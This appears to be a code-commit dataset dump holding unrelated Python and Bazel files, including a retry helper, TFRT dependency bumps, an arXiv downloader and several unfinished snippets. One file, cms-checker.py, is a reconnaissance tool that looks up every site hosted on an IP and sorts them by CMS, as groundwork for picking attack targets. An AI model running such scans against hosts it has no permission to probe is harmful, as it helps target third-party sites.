        label.set_alignment(0, 1)
        amtVbox.pack_start(label, False, False, 0)
        adj = gtk.Adjustment(0, 1000000, 100000000.0, 1.0)
        sendamtSpinner = gtk.SpinButton(adj, 1.0, 0)
        sendamtSpinner.set_wrap(False)
        #~ sendamtSpinner.set_size_request(100, -1)
        amtVbox.pack_start(sendamtSpinner, False, False, 0)
        #~ sendButton.connect("clicked", lambda w: prSend(adrEntry, sendamtSpinner))
        sendButton.connect("clicked", self.dialogg, adrEntry, sendamtSpinner)
        quitButton = gtk.Button("Quit")
        quitButton.connect("clicked", lambda w: gtk.main_quit())
        buttonBox = gtk.HBox(False, 0)
        buttonBox.pack_start(quitButton, False, False, 5)
        main_vbox.pack_start(buttonBox, False, False, 5)
        window.show_all()
def main():
    # Connect the global RPC socket to the local lit node, then block in the
    # GTK main loop until the window is closed.
    s.connect(("127.0.0.1", 8001))
    gtk.main()
    return 0
if __name__ == "__main__":
lndrpcui()
main()
| Python | 0 | |
398a6d23266e52436e6b8efd9d7ab053f490eb45 | add a lib to support requests with retries | octopus/lib/requests_get_with_retries.py | octopus/lib/requests_get_with_retries.py | import requests
from time import sleep
def http_get_with_backoff_retries(url, max_retries=5, timeout=30):
    """GET `url`, retrying on timeout with exponential backoff.

    Makes at most `max_retries` + 1 attempts, sleeping 2**attempt seconds
    between attempts.  Returns the `requests` response object, or None when
    `url` is falsy or every attempt timed out.  Non-timeout errors propagate.
    """
    if not url:
        return
    attempt = 0
    r = None
    while attempt <= max_retries:
        try:
            r = requests.get(url, timeout=timeout)
            break
        except requests.exceptions.Timeout:
            attempt += 1
            # Previously we also slept after the *final* failed attempt,
            # stalling the caller for 2**(max_retries+1) seconds for nothing.
            if attempt <= max_retries:
                sleep(2 ** attempt)
return r | Python | 0 | |
a8b524318d7f9d4406193d610b2bb3ef8e56e147 | Add frameless drag region example. | examples/frameless_drag_region.py | examples/frameless_drag_region.py | import webview
'''
This example demonstrates a user-provided "drag region" to move a frameless window
around, whilst maintaining normal mouse down/move events elsewhere. This roughly
replicates the native `-webkit-app-region: drag` behaviour.
'''
html = '''
<head>
<style type="text/css">
.pywebview-drag-region {
width: 50px;
height: 50px;
margin-top: 50px;
margin-left: 50px;
background: orange;
}
</style>
</head>
<body>
<div class="pywebview-drag-region">Drag me!</div>
</body>
'''
if __name__ == '__main__':
    # Frameless window with easy_drag disabled: only elements carrying the
    # `pywebview-drag-region` CSS class act as drag handles.
    window = webview.create_window(
        'API example',
        html=html,
        frameless=True,
        easy_drag=False,
    )
    webview.start()
| Python | 0 | |
6fde041c3a92f0d0a0b92da55b12c8e60ecc7196 | Create handle_file.py | handle_file.py | handle_file.py | import os,sys,subprocess
# Debug flag: the membership test already yields a bool, so `or False` was redundant.
g_dbg = '-dbg' in sys.argv
def handle_generic(fp,fn,fe):
    # Fallback handler: just report that the extension is unsupported (Python 2).
    print 'Unknown extension for [{}]'.format(fp)
def handle_md(fp,fn,fe):
    # Extract a shell command embedded in an HTML comment ("<!--- cmd -->")
    # near the top of a Markdown file and run it from the file's directory.
    started = False; exec_cmd = [];
    with open(fp, "r") as ifile:
        lines = [x.rstrip().strip() for x in ifile.readlines()]
    for line in lines:
        if started or line.startswith('<!---'):
            started = True
            exec_cmd.append(line.replace('<!---', ''))
            # Stop collecting at the closing marker; keep only the text before it.
            if '-->' in exec_cmd[-1]:
                exec_cmd[-1] = exec_cmd[-1].split('-->')[0]
                break
    if len(exec_cmd):
        exec_cmd = ''.join(exec_cmd)
        if g_dbg:
            print 'exec_cmd = [{}]'.format(exec_cmd)
            sys.stdout.flush()
        print 'running ...'; sys.stdout.flush()
        # Run relative to the markdown file so relative paths in the command work.
        os.chdir(os.path.dirname(fp))
        pop = subprocess.Popen(exec_cmd.split())
        pop.wait()
        print 'done'
    else:
        print 'No command found for [{}]'.format(fp)
# Dispatch on file extension; unknown extensions fall back to handle_generic.
k_ext_handlers = {'.md': handle_md}
fp,(fn,fe) = sys.argv[1], os.path.splitext(sys.argv[1])
if g_dbg:
    print 'fp,(fn,fe) = ', fp,(fn,fe)
k_ext_handlers.get(fe, handle_generic)(fp,fn,fe)
| Python | 0.000003 | |
829dbfe0c13284345e0fa305f71937738a6c8f50 | Create cms-checker.py | web/cms-checker.py | web/cms-checker.py | #!/usr/bin/env python
# Original source: http://www.blackcoder.info/c/cmschecker.txt
# Usage example: $ python cms-checker.py --addr 192.168.1.1
import urllib2
import argparse
import os
import sys
class neo:
    # Reverse-IP lookup plus naive CMS fingerprinting (Python 2 / urllib2).
    def cmsfinder(self):
        # Ask hackertarget for every hostname sharing the target IP, fetch each
        # site, and grep the HTML for CMS marker strings, appending hostnames
        # to per-CMS text files.  Relies on the module-level `args` parsed below.
        url = "http://api.hackertarget.com/reverseiplookup/?q="+args.addr
        rever = urllib2.Request(url)
        conn = urllib2.urlopen(rever).read()
        sp = conn.split("\n")
        for s in sp:
            CMS_URL = "http://"+s
            _Con = urllib2.Request(CMS_URL)
            _Data = urllib2.urlopen(_Con).read()
            # The \033[...m sequences are ANSI colour escapes for the console.
            if 'Joomla' in _Data:
                print "\t\t"+ s + '\t\033[1;34m --> Joomla\033[1;m'
                with open('Joomla.txt', 'a') as j:
                    j.write(s+"\n")
            elif 'wordpress' in _Data:
                print "\t\t"+ s + '\t\033[1;38m --> WordPress\033[1;m'
                with open('Wordpress.txt', 'a') as w:
                    w.write(s+"\n")
            elif 'Drupal' in _Data:
                print "\t\t"+ s + '\t\033[1;36m --> Drupal\033[1;m'
                with open('Drupal.txt', 'a') as D:
                    D.write(s+"\n")
            elif 'vBulletin' in _Data:
                print "\t\t"+ s + '\t\033[1;38m --> vBulletin \033[1;m'
                with open('vBulletin.txt', 'a') as vB:
                    vB.write(s+"\n")
            else:
                print "\t\t"+ s + '\t\033[1;37m --> No CMS \033[1;m'
                with open('normal_site.txt', 'a') as f:
                    f.write(s+"\n")
    def __init__(self):
        # Clear the console (Windows vs POSIX), show the banner, and bail out
        # with a usage message when no arguments were given.
        if os.name == "nt":
            os.system('cls')
        else:
            os.system('clear')
        banner = """ \t\t\t\t
\t\t\t\t\033[1;31m
\t\t\t\t  _____ _____ _____    _____ _       _
\t\t\t\t |     |     |   __|  |   __|_|___ _| |___ ___
\t\t\t\t |   --| | | |__   |  |   __| |   | . | -_|  _|
\t\t\t\t |_____|_|_|_|_____|  |__|  |_|_|_|___|___|_|
\t\t\t\t \033[1;m
\t\t\t\tCoded By Ne0-h4ck3r
         """
        print banner
        print ""
        print "\t\t" + "-" * 100
        print ""
        if len(sys.argv) == 1:
            print ""
            print "\t\tHow To Use: python sitecheker.py --addr [ IP ]"
            print ""
            sys.exit(1)
# Module-level CLI parsing: `args` must exist before neo().cmsfinder() runs.
black = argparse.ArgumentParser()
black.add_argument('--addr', help="Enter Your IP-ADDRESS: ")
args = black.parse_args()
if __name__ == "__main__":
    neo().cmsfinder()
| Python | 0.000002 | |
85a604a1991b5dc9a017514848645723921247a7 | add missing file | mcp/constants.py | mcp/constants.py | #
# Copyright (c) 2007 rPath, Inc.
#
# All rights reserved
#
version = '1.0.0'  # mcp package version string (single source for tooling)
| Python | 0.000003 | |
a857340a2d67a8055b9e3802327800dcdd652df4 | Update TFRT dependency to use revision http://github.com/tensorflow/runtime/commit/037eb7657cb3f49c70c18f959421831e6cb9e4ad. | third_party/tf_runtime/workspace.bzl | third_party/tf_runtime/workspace.bzl | """Provides the repository macro to import TFRT."""
load("//third_party:repo.bzl", "tf_http_archive", "tf_mirror_urls")
def repo():
    """Imports TFRT (tensorflow/runtime), pinned to TFRT_COMMIT."""
    # Attention: tools parse and update these lines.
    # (TFRT_COMMIT and TFRT_SHA256 are rewritten together by automation;
    # keep their exact formatting.)
    TFRT_COMMIT = "037eb7657cb3f49c70c18f959421831e6cb9e4ad"
    TFRT_SHA256 = "80194df160fb8c91c7fcc84f34a60c16d69bd66f6b2f8e5404fae5e7d1221533"
    tf_http_archive(
        name = "tf_runtime",
        sha256 = TFRT_SHA256,
        strip_prefix = "runtime-{commit}".format(commit = TFRT_COMMIT),
        urls = tf_mirror_urls("https://github.com/tensorflow/runtime/archive/{commit}.tar.gz".format(commit = TFRT_COMMIT)),
        # A patch file can be provided for atomic commits to both TF and TFRT.
        # The job that bumps the TFRT_COMMIT also resets patch_file to 'None'.
        patch_file = None,
    )
| """Provides the repository macro to import TFRT."""
load("//third_party:repo.bzl", "tf_http_archive", "tf_mirror_urls")
def repo():
    """Imports TFRT (tensorflow/runtime), pinned to TFRT_COMMIT."""
    # Attention: tools parse and update these lines.
    # (TFRT_COMMIT and TFRT_SHA256 are rewritten together by automation;
    # keep their exact formatting.)
    TFRT_COMMIT = "d6884515d2b821161b35c1375d6ea25fe6811d62"
    TFRT_SHA256 = "0771a906d327a92bdc46b02c8ac3ee1593542ceadc07220e53790aa8c7ea5702"
    tf_http_archive(
        name = "tf_runtime",
        sha256 = TFRT_SHA256,
        strip_prefix = "runtime-{commit}".format(commit = TFRT_COMMIT),
        urls = tf_mirror_urls("https://github.com/tensorflow/runtime/archive/{commit}.tar.gz".format(commit = TFRT_COMMIT)),
        # A patch file can be provided for atomic commits to both TF and TFRT.
        # The job that bumps the TFRT_COMMIT also resets patch_file to 'None'.
        patch_file = None,
    )
| Python | 0.000002 |
c563f12bcb8b10daca64e19ade3c373c112cb659 | Update TFRT dependency to use revision http://github.com/tensorflow/runtime/commit/8f7619fa042357fa754002104f575a8a72ee69ed. | third_party/tf_runtime/workspace.bzl | third_party/tf_runtime/workspace.bzl | """Provides the repository macro to import TFRT."""
load("//third_party:repo.bzl", "tf_http_archive")
def repo():
    """Imports TFRT (tensorflow/runtime), pinned to TFRT_COMMIT."""
    # Attention: tools parse and update these lines.
    # (TFRT_COMMIT and TFRT_SHA256 are rewritten together by automation;
    # keep their exact formatting.)
    TFRT_COMMIT = "8f7619fa042357fa754002104f575a8a72ee69ed"
    TFRT_SHA256 = "2cb8410fb4655d71c099fb9f2d3721d0e485c8db518553347ce21ca09e0e1b43"
    tf_http_archive(
        name = "tf_runtime",
        sha256 = TFRT_SHA256,
        strip_prefix = "runtime-{commit}".format(commit = TFRT_COMMIT),
        # Mirror is listed first; the GitHub archive is the fallback.
        urls = [
            "http://mirror.tensorflow.org/github.com/tensorflow/runtime/archive/{commit}.tar.gz".format(commit = TFRT_COMMIT),
            "https://github.com/tensorflow/runtime/archive/{commit}.tar.gz".format(commit = TFRT_COMMIT),
        ],
    )
| """Provides the repository macro to import TFRT."""
load("//third_party:repo.bzl", "tf_http_archive")
def repo():
    """Imports TFRT (tensorflow/runtime), pinned to TFRT_COMMIT."""
    # Attention: tools parse and update these lines.
    # (TFRT_COMMIT and TFRT_SHA256 are rewritten together by automation;
    # keep their exact formatting.)
    TFRT_COMMIT = "584ba7eab84bd45941fabc28fbe8fa43c74673d8"
    TFRT_SHA256 = "e2f45638580ba52116f099d52b73c3edcf2ad81736a434fb639def38ae4cb225"
    tf_http_archive(
        name = "tf_runtime",
        sha256 = TFRT_SHA256,
        strip_prefix = "runtime-{commit}".format(commit = TFRT_COMMIT),
        # Mirror is listed first; the GitHub archive is the fallback.
        urls = [
            "http://mirror.tensorflow.org/github.com/tensorflow/runtime/archive/{commit}.tar.gz".format(commit = TFRT_COMMIT),
            "https://github.com/tensorflow/runtime/archive/{commit}.tar.gz".format(commit = TFRT_COMMIT),
        ],
    )
| Python | 0.000001 |
29e3d6b706a33780b1cb4863200ec7525ff035ce | Update TFRT dependency to use revision http://github.com/tensorflow/runtime/commit/cdf6d36e9a5c07770160ebac25b153481c37a247. | third_party/tf_runtime/workspace.bzl | third_party/tf_runtime/workspace.bzl | """Provides the repository macro to import TFRT."""
load("//third_party:repo.bzl", "tf_http_archive")
def repo():
    """Imports TFRT (tensorflow/runtime), pinned to TFRT_COMMIT."""
    # Attention: tools parse and update these lines.
    # (TFRT_COMMIT and TFRT_SHA256 are rewritten together by automation;
    # keep their exact formatting.)
    TFRT_COMMIT = "cdf6d36e9a5c07770160ebac25b153481c37a247"
    TFRT_SHA256 = "c197f9b3584cae2d65fc765f999298ae8b70d9424ec0d4dd30dbdad506fb98bb"
    tf_http_archive(
        name = "tf_runtime",
        sha256 = TFRT_SHA256,
        strip_prefix = "runtime-{commit}".format(commit = TFRT_COMMIT),
        # Mirror is listed first; the GitHub archive is the fallback.
        urls = [
            "http://mirror.tensorflow.org/github.com/tensorflow/runtime/archive/{commit}.tar.gz".format(commit = TFRT_COMMIT),
            "https://github.com/tensorflow/runtime/archive/{commit}.tar.gz".format(commit = TFRT_COMMIT),
        ],
    )
| """Provides the repository macro to import TFRT."""
load("//third_party:repo.bzl", "tf_http_archive")
def repo():
    """Imports TFRT (tensorflow/runtime), pinned to TFRT_COMMIT."""
    # Attention: tools parse and update these lines.
    # (TFRT_COMMIT and TFRT_SHA256 are rewritten together by automation;
    # keep their exact formatting.)
    TFRT_COMMIT = "6ca8a6dff0e5d4f3a17b0c0879aa5de622683680"
    TFRT_SHA256 = "09779efe84cc84e859e206dd49ae6b993577d7dae41f90491e5b862d7a70ba51"
    tf_http_archive(
        name = "tf_runtime",
        sha256 = TFRT_SHA256,
        strip_prefix = "runtime-{commit}".format(commit = TFRT_COMMIT),
        # Mirror is listed first; the GitHub archive is the fallback.
        urls = [
            "http://mirror.tensorflow.org/github.com/tensorflow/runtime/archive/{commit}.tar.gz".format(commit = TFRT_COMMIT),
            "https://github.com/tensorflow/runtime/archive/{commit}.tar.gz".format(commit = TFRT_COMMIT),
        ],
    )
| Python | 0.000002 |
6276cf142d233db377dc490a47c5ad56d2906c75 | Add version module | cards/version.py | cards/version.py | # coding=utf-8
__version__ = '0.4.9'  # single source of the package version
| Python | 0 | |
6c7df140c6dccb4b56500ba25f6b66ab7ea3b605 | solve 1 problem | solutions/reverse-bits.py | solutions/reverse-bits.py | #!/usr/bin/env python
# encoding: utf-8
"""
reverse-bits.py
Created by Shuailong on 2016-03-02.
https://leetcode.com/problems/reverse-bits/.
"""
class Solution(object):
    """LeetCode 190: reverse the bits of a 32-bit unsigned integer."""

    def reverseBits(self, n):
        """
        :type n: int
        :rtype: int
        """
        # Peel bits off the low end of n and push them onto the low end of
        # the result, which reverses their order.
        reversed_bits = 0
        consumed = 0
        while n:
            reversed_bits = (reversed_bits << 1) | (n & 1)
            n >>= 1
            consumed += 1
        # The untouched high-order bits of the input are zeros; shifting left
        # moves the reversed run into its final 32-bit position.
        return reversed_bits << (32 - consumed)
def main():
    # Smoke test with the LeetCode sample input (Python 2 print statement).
    solution = Solution()
    n = 43261596
    print solution.reverseBits(n)
if __name__ == '__main__':
    main()
| Python | 0.000027 | |
793b273c3fdcef428ffb6aec5dbcbb768989f175 | Add 0004 file | Drake-Z/0004/0004.py | Drake-Z/0004/0004.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
'第 0004 题:任一个英文的纯文本文件,统计其中的单词出现的个数。'
__author__ = 'Drake-Z'
import re
def tongji(file_path):
    """Count the words in the plain-text file at *file_path*.

    Words are separated by whitespace, commas or semicolons.  Prints the
    count and returns 0 (return value kept for backward compatibility).
    """
    # `with` closes the file even on error (the original leaked the handle).
    with open(file_path, 'r') as f:
        text = f.read()
    # Drop the empty strings re.split yields at the edges (e.g. a trailing
    # newline) so they are not counted as words.
    words = [w for w in re.split(r'[\s\,\;,\n]+', text) if w]
    print(len(words))
    return 0
if __name__ == '__main__':
    # Demo run; expects an 'English.txt' file next to the script.
    file_path = 'English.txt'
tongji(file_path) | Python | 0.000001 | |
06f66859c305465c3f6f38617ecada4da94d41ff | set up skeleton | algorithms/sorting/quicksort.py | algorithms/sorting/quicksort.py | from random import randint
def quicksort(unsorted):
    """Return a new list with the elements of *unsorted* in ascending order.

    The input list is not modified.  Previously this was an unfinished
    skeleton that returned None for any input longer than one element.
    """
    if len(unsorted) <= 1:
        return unsorted
    # Random pivot avoids quadratic behaviour on already-sorted input.
    pivot_index = randint(0, len(unsorted) - 1)
    pivot = unsorted[pivot_index]
    rest = unsorted[:pivot_index] + unsorted[pivot_index + 1:]
    lesser = [x for x in rest if x <= pivot]
    greater = [x for x in rest if x > pivot]
    return quicksort(lesser) + [pivot] + quicksort(greater)
def choose_pivot(start, end):
    """Return a pivot index drawn uniformly from [start, end], inclusive."""
    return randint(start, end)
def sort(unsorted, start, pivot, end):
    # TODO: intended in-place partition step of the skeleton; not implemented yet.
    pass
if __name__ == '__main__':
    # Ad-hoc demo (Python 2 print statements).
    unsorted = [3,345,456,7,879,970,7,4,23,123,45,467,578,78,6,4,324,145,345,3456,567,5768,6589,69,69]
    sort = quicksort(unsorted)  # NOTE(review): rebinding `sort` shadows the sort() helper above
    print '%r <-- unsorted' % unsorted
    print '%r <-- sorted' % sort
| Python | 0.000002 | |
0e31b15e4dae95b862fd4777659a9210e5e4ec86 | change of file path | preprocessing/python_scripts/renpass_gis/simple_feedin/renpassgis_feedin.py | preprocessing/python_scripts/renpass_gis/simple_feedin/renpassgis_feedin.py | """
TODO:
 * Create one scaled time series
*
Database table:
* model_draft.ego_weather_measurement_point
* model_draft.ego_simple_feedin_full
Change db.py and add ego_simple_feedin_full
"""
__copyright__ = "ZNES"
__license__ = "GNU Affero General Public License Version 3 (AGPL-3.0)"
__url__ = "https://github.com/openego/data_processing/blob/master/LICENSE"
__author__ = "wolf_bunke"
from oemof.db import coastdat
import db
import pandas as pd
# get Classes and make settings
points = db.Points
conn = db.conn
scenario_name = 'eGo 100'
weather_year = 2011
filename = '2017-08-21_simple_feedin_ego-100-wj2011_all.csv'
config = 'config.ini'
import pandas as pd
import psycopg2
from sqlalchemy import create_engine
import numpy as np
from db import conn, readcfg, dbconnect
import os
# Settings
#filename = '2017-08-07_simple_feedin_All_subids_weatherids_ego_weatherYear2011.csv'
filename = 'simple_feedin_full.csv'
conn = conn
# read configuration file
path = os.path.join(os.path.expanduser("~"), '.open_eGo', 'config.ini')
config = readcfg(path=path)
# establish DB connection
section = 'oedb'
conn = dbconnect(section=section, cfg=config)
| Python | 0.000002 | |
cbd64641f30c1a464528a2ec6d5323d29766830d | Add word embedding | hazm/embedding.py | hazm/embedding.py | from . import word_tokenize
from gensim.models import KeyedVectors
from gensim.scripts.glove2word2vec import glove2word2vec
import fasttext, os
supported_embeddings = ['fasttext', 'keyedvector', 'glove']

class WordEmbedding:
    """Uniform facade over fastText, gensim KeyedVectors and GloVe vectors."""

    def __init__(self, model_type, model=None):
        """Remember the backend type and, optionally, an already-loaded model.

        Raises KeyError for unsupported model types.
        """
        if model_type not in supported_embeddings:
            raise KeyError(f'Model type "{model_type}" is not supported! Please choose from {supported_embeddings}')
        # Always bind the attribute: it was previously left unset when no
        # model was given, so the "load model first" checks below raised a
        # bare AttributeError instead of their intended message.
        self.model = model
        self.model_type = model_type

    def load_model(self, model_file):
        """Load vectors from *model_file* according to self.model_type."""
        if self.model_type == 'fasttext':
            self.model = fasttext.load_model(model_file)
        elif self.model_type == 'keyedvector':
            # A ".bin" suffix means word2vec binary format; otherwise text.
            if model_file.endswith('bin'):
                self.model = KeyedVectors.load_word2vec_format(model_file, binary=True)
            else:
                self.model = KeyedVectors.load_word2vec_format(model_file)
        elif self.model_type == 'glove':
            # Convert GloVe to word2vec format once and reuse the cached file.
            word2vec_addr = str(model_file) + '_word2vec_format.vec'
            if not os.path.exists(word2vec_addr):
                _ = glove2word2vec(model_file, word2vec_addr)
            self.model = KeyedVectors.load_word2vec_format(word2vec_addr)
            # From here on a GloVe model behaves exactly like KeyedVectors.
            self.model_type = 'keyedvector'
        else:
            raise KeyError(f'{self.model_type} not supported! Please choose from {supported_embeddings}')

    def __getitem__(self, word):
        """Return the embedding vector for *word*."""
        if not self.model:
            raise AttributeError('Model must not be None! Please load model first.')
        return self.model[word]

    def doesnt_match(self, txt):
        """Tokenize *txt* and return the token least similar to the others."""
        if not self.model:
            raise AttributeError('Model must not be None! Please load model first.')
        return self.model.doesnt_match(word_tokenize(txt))

    def similarity(self, word1, word2):
        """Return the similarity score between two words."""
        if not self.model:
            raise AttributeError('Model must not be None! Please load model first.')
        return self.model.similarity(word1, word2)

    def get_vocab(self):
        """Return the vocabulary with frequencies.

        NOTE(review): get_words() is a fastText API -- confirm behaviour for
        KeyedVectors-backed models.
        """
        if not self.model:
            raise AttributeError('Model must not be None! Please load model first.')
        return self.model.get_words(include_freq=True)

    def nearest_words(self, word, topn):
        """Return the *topn* nearest neighbours of *word* (fastText API)."""
        if not self.model:
            raise AttributeError('Model must not be None! Please load model first.')
        return self.model.get_nearest_neighbors(word, topn)
| Python | 0.00733 | |
f34c91a6969567b23ad880dc43a0346cc5a5b513 | Add get_arxiv.py to download PDF from arXiv | cli/get_arxiv.py | cli/get_arxiv.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Get the arxiv abstract data and PDF for a given arxiv id.
#
# Weitian LI <liweitianux@gmail.com>
# 2015/01/23
#
import sys
import re
import urllib
import urllib.request  # `import urllib` alone does not bind the request submodule
import subprocess
import time
import mimetypes

from bs4 import BeautifulSoup
mirror = "http://jp.arxiv.org/"
def get_url(arxiv_id):
    """
    Determine the full arxiv URL from the given ID/URL.

    Accepts a new-style ID (e.g. "1401.1234"), a full http(s) URL, or a
    bare host/path without scheme; old-style 7-digit IDs are rejected.
    Exits the process on invalid input (this is a CLI helper).
    """
    if re.match(r'^[0-9]{7}$', arxiv_id):
        print("ERROR: 7-digit ID not supported, please use the full URL")
        sys.exit(2)
    elif re.match(r'^[0-9]{4}\.[0-9]{4,5}$', arxiv_id):
        arxiv_url = mirror + "abs/" + arxiv_id
    elif re.match(r'^https{0,1}://.*arxiv.*/([0-9]{7}|[0-9]{4}\.[0-9]{4,5})$',
            arxiv_id):
        arxiv_url = arxiv_id
    elif re.match(r'[a-zA-Z0-9.-]*arxiv.*/([0-9]{7}|[0-9]{4}\.[0-9]{4,5})$',
            arxiv_id):
        # Looks like an arxiv URL missing its scheme; default to http.
        arxiv_url = "http://" + arxiv_id
    else:
        print("ERROR: unknown arxiv ID: %s" % arxiv_id)
        # sys.exit for consistency with the branch above; the bare exit()
        # builtin is only guaranteed when the `site` module is loaded.
        sys.exit(3)
    return arxiv_url
def get_id(arxiv_url):
    """Extract the arxiv ID, i.e. everything after the last '/'."""
    _, _, tail = arxiv_url.rpartition('/')
    return tail
def get_arxiv_abstract(arxiv_url):
    """
    Get the arxiv abstract data and save it to the file '${id}.txt'.

    Scrapes title, authors, dateline, abstract, comments and subjects from
    the /abs/ page and writes a plain-text summary into the current directory.
    """
    request = urllib.request.urlopen(arxiv_url)
    arxiv_html = request.read()
    soup = BeautifulSoup(arxiv_html)
    # Flatten multi-line fields to single lines for the text summary.
    title = soup.body.find('h1', attrs={'class': 'title'}).text\
            .replace('\n', ' ')
    authors = soup.body.find('div', attrs={'class': 'authors'}).text\
            .replace('\n', ' ')
    date = soup.body.find('div', attrs={'class': 'dateline'}).text\
            .strip('()')
    abstract = soup.body.find('blockquote', attrs={'class': 'abstract'})\
            .text.replace('\n', ' ')[1:]
    comments = soup.body.find('td', attrs={'class': 'comments'}).text
    subjects = soup.body.find('td', attrs={'class': 'subjects'}).text
    arxiv_id = get_id(arxiv_url)
    filename = arxiv_id + '.txt'
    # The context manager closes the file even if a write fails
    # (the original leaked the handle on error).
    with open(filename, 'w') as f:
        f.write("URL: %s\n" % arxiv_url)
        f.write("arXiv: %s\n" % arxiv_id)
        f.write("%s\n\n" % date)
        f.write("%s\n%s\n\n" % (title, authors))
        f.write("%s\n\n" % abstract)
        f.write("Comments: %s\n" % comments)
        f.write("Subjects: %s\n" % subjects)
def get_arxiv_pdf(arxiv_url):
    """
    Get the arxiv PDF with cURL.
    If the PDF is not generated yet, then retry after 10 seconds.

    NOTE(review): retries forever if the server never serves a PDF --
    consider bounding the number of attempts.
    """
    arxiv_pdf_url = re.sub(r'/abs/', '/pdf/', arxiv_url)
    arxiv_id = get_id(arxiv_url)
    filename = arxiv_id + '.pdf'
    # Run curl with an argv list (shell=False): the filename/URL come from
    # user input, so a shell command string would be injectable.
    cmd = ['curl', '-o', filename, arxiv_pdf_url]
    print("CMD: %(cmd)s" % {'cmd': ' '.join(cmd)})
    subprocess.call(cmd)

    def _mime_type():
        # `file -ib` prints e.g. "application/pdf; charset=binary".
        output = subprocess.check_output(['file', '-ib', filename])
        return output.decode(encoding='UTF-8').split(';')[0]

    while _mime_type() != 'application/pdf':
        time.sleep(10)
        subprocess.call(cmd)
def main():
    """CLI entry point: fetch abstract text and PDF for one arxiv ID/URL."""
    if len(sys.argv) != 2:
        # The %s placeholder used to be printed literally; interpolate the
        # program name so the usage line is actually helpful.
        print("Usage: %s <arxiv_id | arxiv_url>\n" % sys.argv[0])
        sys.exit(1)
    arxiv_url = get_url(sys.argv[1])
    arxiv_id = get_id(arxiv_url)
    print("arxiv_url: %s" % arxiv_url)
    print("arxiv_id: %s" % arxiv_id)
    get_arxiv_abstract(arxiv_url)
    print("downloading pdf ...")
    get_arxiv_pdf(arxiv_url)
if __name__ == '__main__':
    # CLI entry point; invalid input exits via sys.exit inside the helpers.
    main()
| Python | 0 | |
13851dd6f2101ceea917504bd57540a4e54f0954 | Create __init__.py | fb_nsitbot/migrations/__init__.py | fb_nsitbot/migrations/__init__.py | Python | 0.000429 | ||
14647b71fec7a81d92f044f6ac88304a4b11e5fd | create http server module | src/step1.py | src/step1.py | """A simple HTTP server."""
def response_ok():
    """Testing for 200 response code."""
    # TODO: presumably should build and return an HTTP "200 OK" response;
    # currently a stub that returns None -- confirm the intended contract.
    pass
| Python | 0 | |
0a97f34b4ae4f7f19bfe00c26f495f399f827fab | Add file_regex | python/file_regex/tmp.py | python/file_regex/tmp.py | # -*- coding: utf-8 -*-
import re
# Base name of the file pair: reads '<name>.txt', writes '<name>_after.txt'.
file_name = 'hogehoge'

# Context managers close both files even if something in between raises
# (the original left handles open on error).
with open(file_name + '.txt') as org_file:
    contents = org_file.read()

# Non-greedy match so adjacent title="..." attributes are captured one by one.
pattern = r'title=\".+?\"'
all_title = re.findall(pattern, contents)

with open(file_name + '_after.txt', 'w') as dist_file:
    # Strip the markup so only the bare title text is written, one per line.
    for title in all_title:
        dist_file.write(title.replace('\"', '').replace('title=', '') + '\n')
| Python | 0.000001 | |
0297e8b1762d495ffd696106bc6498def0ddf600 | Add membership.utils.monthRange to calculate start and end dates of months easily | spiff/membership/utils.py | spiff/membership/utils.py | import datetime
import calendar
from django.utils.timezone import utc
def monthRange(today=None):
    """Return (start, end) datetimes for *today*'s month, both UTC-aware.

    `start` is the first day and `end` the last day of the month, each at
    midnight.  When *today* is omitted, the current UTC time is used.
    """
    if today is None:
        today = datetime.datetime.utcnow().replace(tzinfo=utc)
    _, last_day = calendar.monthrange(today.year, today.month)
    first_of_month = datetime.datetime(today.year, today.month, 1, tzinfo=utc)
    last_of_month = datetime.datetime(today.year, today.month, last_day, tzinfo=utc)
    return (first_of_month, last_of_month)
| Python | 0 | |
6441ce1bc3132220e2d86bb75eff9169b3675751 | add spiderNormal | spiderNormal.py | spiderNormal.py | #!/usr/bin/python
# -*- coding: utf-8 -*-
#author zeck.tang 2016.03.03
"""
文件头两行注释是用于避免文件中包含中文导致如下错误
SyntaxError: Non-ASCII character XXX in file xxx.py on line xx, but no encoding declared
see http://python.org/dev/peps/pep-0263/ for details
如果遇到
IndentationError: unexpected indent
这样的错误,请仔细检查每个空格和tab
"""
import urllib
import urllib2
import re
# 这个是百度手机助手里面优酷的用户评论的信息获取url,咱是用Charles抓包拿到的
# ps:这个只有第一页数据,可以改写下动态传入pn参数值获取后续页面的信息
url = 'http://shouji.baidu.com/comment?action_type=getCommentList&groupid=3528441&pn=1'
# UserAgent设置 如果有需要UA的话
#user_agent = 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'
#headers = { 'User-Agent' : user_agent }
try:
# UA塞进头里
#request = urllib2.Request(url,headers = headers)
request = urllib2.Request(url)
response = urllib2.urlopen(request)
content = response.read().decode('utf-8') # utf-8格式读出来避免乱码
# 可以先打印看看content内容然后看怎么写正则
# print content
# content内容非常规则,每个<li></li>包含一条评论信息内容
# <em>(.*?)</em>是用户名称
# <p>(.*?)</p>是评论内容
# <div.*?time">(.*?)</div>是评论时间
pattern = re.compile('<em>(.*?)</em>.*?<p>(.*?)</p>.*?<div.*?time">(.*?)</div>',re.S)
items = re.findall(pattern,content)
for item in items:
#打印每一条评论
print item[0] #用户名称
print item[1] #用户评论
print item[2] #评论时间
print "----------"
except urllib2.URLError, e:
if hasattr(e,"code"):
print e.code
else :
print "code else"
if hasattr(e,"reason"):
print e.reason
else:
print "reason else"
| Python | 0.999891 | |
747733309d0fb0c47dac2ae8c0056a461c632b5c | Add base classes and run some experiments | sudoku.py | sudoku.py | """
Module for solving Sudoku Puzzles
"""
class Cell(object):
    """A single sudoku cell plus links to its containing row/column/box."""

    def __init__(self, value=None):
        """Create an unsolved cell; -1 marks "no value assigned yet"."""
        self.solved = False
        self.excluded = []
        self.value = -1 if value is None else value
        self.row = None
        self.column = None
        self.box = None

    def exclude(self):
        # TODO: add all values in the parent row, column and box to `excluded`.
        pass
class Line(object):
    """A row or column: an ordered collection of cells."""

    def __init__(self, cells=None):
        # Default to a fresh list (avoids the shared-mutable-default pitfall).
        self.cells = [] if cells is None else cells
class Box(object):
    """A 3x3 box of nine cells with lookup tables for its local rows/columns."""

    def __init__(self, cells=None):
        self.cells = cells if cells is not None else []
        self.rows = []
        self.columns = []
        self.unsolved_cell_indices = []
        self.unsolved_values = []
        # Map a cell index (0-8, row-major within the box) to the box-local
        # columns it is NOT in, and likewise for rows.
        self.cell_to_noncolumn = {
            0: [1,2],
            3: [1,2],
            6: [1,2],
            1: [0,2],
            4: [0,2],
            7: [0,2],
